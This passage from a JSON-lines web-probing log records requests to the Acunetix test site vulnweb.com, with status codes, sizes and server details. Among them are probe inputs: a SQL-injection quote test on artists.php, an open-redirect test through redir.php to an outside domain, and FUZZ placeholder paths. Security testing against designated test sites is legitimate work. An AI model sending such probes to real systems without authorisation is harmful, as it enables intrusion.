Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/101433\",\"time\":\"351.065109ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:10.28908437Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/author/admin/feed/\",\"input\":\"http://vulnweb.com/author/admin/feed/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/author/admin/feed/\",\"time\":\"353.194463ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:10.289502473Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/FUZZ********************************************************\",\"input\":\"http://vulnweb.com/FUZZ********************************************************\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/FUZZ********************************************************\",\"time\":\"353.482ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:10.289846031Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/FUZZ*********************************************************\",\"input\":\"http://vulnweb.com/FUZZ*********************************************************\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/FUZZ*********************************************************\",\"time\":\"352.740787ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:10.289984709Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/FUZZMultiple\",\"input\":\"http://vulnweb.com/FUZZMultiple\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/FUZZMultiple\",\"time\":\"351.008673ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:10.290012837Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/account.php?id={$id}\",\"input\":\"http://vulnweb.com/account.php?id={$id}\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/account.php?id={$id}\",\"time\":\"352.283951ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:10.290599579Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/101435\",\"input\":\"http://vulnweb.com/101435\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/101435\",\"time\":\"353.793245ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:10.290886436Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/artists.php?artist=3\",\"input\":\"http://vulnweb.com/artists.php?artist=3\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=3\",\"time\":\"355.337277ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:10.291823052Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/ads.txt\",\"input\":\"http://vulnweb.com/ads.txt\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ads.txt\",\"time\":\"353.216854ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:10.292917831Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/artists.php?artist=1'\",\"input\":\"http://vulnweb.com/artists.php?artist=1'\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1'\",\"time\":\"356.161745ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:10.296269506Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/artists.php?artist=3-D\",\"input\":\"http://vulnweb.com/artists.php?artist=3-D\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=3-D\",\"time\":\"359.584635ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:10.30157019Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/acunetix-logo.png\",\"input\":\"http://vulnweb.com/acunetix-logo.png\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/png\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/acunetix-logo.png\",\"time\":\"356.831849ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":20,\"lines\":18,\"status_code\":200,\"content_length\":4474,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:10.301214029Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com\",\"input\":\"http://vulnweb.com\",\"title\":\"Acunetix Web Vulnerability Scanner - Test websites\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"356.265818ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":482,\"lines\":74,\"status_code\":200,\"content_length\":4018,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:12.486919878Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/search.php?test=queryWhich\",\"input\":\"http://vulnweb.com/search.php?test=queryWhich\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/search.php?test=queryWhich\",\"time\":\"342.721653ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:12.4892058Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/redir.php?r=http://strategicgrowthexperts.com/\",\"input\":\"http://vulnweb.com/redir.php?r=http://strategicgrowthexperts.com/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://strategicgrowthexperts.com/\",\"time\":\"346.292814ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:12.490271399Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/table-images/back.png\",\"input\":\"http://vulnweb.com/table-images/back.png\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/png\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/table-images/back.png\",\"time\":\"343.974728ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":3,\"status_code\":200,\"content_length\":488,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:12.491185048Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/search.php\",\"input\":\"http://vulnweb.com/search.php\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/search.php\",\"time\":\"347.059894ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:12.491353453Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/robots.txt\",\"input\":\"http://vulnweb.com/robots.txt\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/robots.txt\",\"time\":\"348.13082ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:12.494924721Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/sample-page/feed/\",\"input\":\"http://vulnweb.com/sample-page/feed/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/sample-page/feed/\",\"time\":\"350.662691ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:12.495095621Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/listproducts.php?cat=FUZZ\",\"input\":\"http://vulnweb.com/listproducts.php?cat=FUZZ\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=FUZZ\",\"time\":\"346.624396ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:12.495748335Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/table-images/gradback.png\",\"input\":\"http://vulnweb.com/table-images/gradback.png\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/png\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/table-images/gradback.png\",\"time\":\"352.734538ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":3,\"status_code\":200,\"content_length\":166,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:12.500986875Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/table-images/botleft.png\",\"input\":\"http://vulnweb.com/table-images/botleft.png\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/png\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/table-images/botleft.png\",\"time\":\"357.85833ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":3,\"status_code\":200,\"content_length\":192,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:12.501156583Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/table-images/botright.png\",\"input\":\"http://vulnweb.com/table-images/botright.png\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/png\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/table-images/botright.png\",\"time\":\"357.153448ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":3,\"lines\":5,\"status_code\":200,\"content_length\":185,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:12.502297936Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/category/uncategorized/feed/\",\"input\":\"http://vulnweb.com/category/uncategorized/feed/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/category/uncategorized/feed/\",\"time\":\"360.881172ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:12.502272167Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/table-images/blurry.jpg\",\"input\":\"http://vulnweb.com/table-images/blurry.jpg\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/jpeg\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/table-images/blurry.jpg\",\"time\":\"353.327621ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":6,\"lines\":13,\"status_code\":200,\"content_length\":2387,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:12.505115388Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/style.css\",\"input\":\"http://vulnweb.com/style.css\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/css\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/style.css\",\"time\":\"352.997643ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":657,\"lines\":576,\"status_code\":200,\"content_length\":9894,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:12.527178059Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/favicon.ico\",\"input\":\"http://vulnweb.com/favicon.ico\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/favicon.ico\",\"time\":\"380.073918ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:20.630626209Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/updataif.php\",\"input\":\"http://vulnweb.com/updataif.php\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/updataif.php\",\"time\":\"338.3701ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:20.63247804Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/table-images/gradhover.png\",\"input\":\"http://vulnweb.com/table-images/gradhover.png\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/png\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/table-images/gradhover.png\",\"time\":\"348.731137ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":3,\"lines\":3,\"status_code\":200,\"content_length\":162,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:20.634188881Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/table-images/gradhead.png\",\"input\":\"http://vulnweb.com/table-images/gradhead.png\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/png\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/table-images/gradhead.png\",\"time\":\"351.485265ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":2,\"lines\":3,\"status_code\":200,\"content_length\":134,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:20.634312644Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/table-images/patternb-head.png\",\"input\":\"http://vulnweb.com/table-images/patternb-head.png\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/png\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/table-images/patternb-head.png\",\"time\":\"342.614951ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":4,\"lines\":7,\"status_code\":200,\"content_length\":316,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:20.635265322Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/table-images/pattern.png\",\"input\":\"http://vulnweb.com/table-images/pattern.png\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/png\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/table-images/pattern.png\",\"time\":\"343.001899ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":4,\"lines\":6,\"status_code\":200,\"content_length\":597,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:20.63917984Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/table-images/pattern-head.png\",\"input\":\"http://vulnweb.com/table-images/pattern-head.png\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/png\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/table-images/pattern-head.png\",\"time\":\"347.982663ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":4,\"lines\":4,\"status_code\":200,\"content_length\":255,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:20.639609959Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/arrows-2x.png\",\"input\":\"http://vulnweb.com/wp-admin/images/arrows-2x.png\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/arrows-2x.png\",\"time\":\"342.25106ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:20.639150835Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/table-images/left.png\",\"input\":\"http://vulnweb.com/table-images/left.png\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/png\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/table-images/left.png\",\"time\":\"351.651032ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":14,\"lines\":14,\"status_code\":200,\"content_length\":2897,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:20.643873168Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/arrows-2x.png?ver=20120916\",\"input\":\"http://vulnweb.com/wp-admin/images/arrows-2x.png?ver=20120916\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/arrows-2x.png?ver=20120916\",\"time\":\"342.795647ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:20.64727147Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/table-images/right.png\",\"input\":\"http://vulnweb.com/table-images/right.png\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/png\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/table-images/right.png\",\"time\":\"355.217528ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":3,\"lines\":5,\"status_code\":200,\"content_length\":220,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:20.647294023Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/table-images/patternb.png\",\"input\":\"http://vulnweb.com/table-images/patternb.png\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/png\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/table-images/patternb.png\",\"time\":\"354.397772ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":3,\"lines\":6,\"status_code\":200,\"content_length\":311,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:20.64758902Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/css/colors-fresh.min.css?ver=8301\",\"input\":\"http://vulnweb.com/wp-admin/css/colors-fresh.min.css?ver=8301\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/css/colors-fresh.min.css?ver=8301\",\"time\":\"354.09625ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:20.651994865Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/updataif.phpStyle=\",\"input\":\"http://vulnweb.com/updataif.phpStyle=\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/updataif.phpStyle=\",\"time\":\"356.375237ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:20.653380898Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/css/wp-admin.min.css?ver=8301\",\"input\":\"http://vulnweb.com/wp-admin/css/wp-admin.min.css?ver=8301\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/css/wp-admin.min.css?ver=8301\",\"time\":\"359.811231ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:20.661723432Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/arrows-dark-2x.png?ver=20120916\",\"input\":\"http://vulnweb.com/wp-admin/images/arrows-dark-2x.png?ver=20120916\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/arrows-dark-2x.png?ver=20120916\",\"time\":\"356.098529ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:20.662436738Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/arrows-dark-2x.png\",\"input\":\"http://vulnweb.com/wp-admin/images/arrows-dark-2x.png\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/arrows-dark-2x.png\",\"time\":\"356.210436ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:22.833680103Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/arrows-dark.png\",\"input\":\"http://vulnweb.com/wp-admin/images/arrows-dark.png\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/arrows-dark.png\",\"time\":\"343.93572ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:22.83728316Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/comment-grey-bubble.png\",\"input\":\"http://vulnweb.com/wp-admin/images/comment-grey-bubble.png\",\"title\":\"404 Not 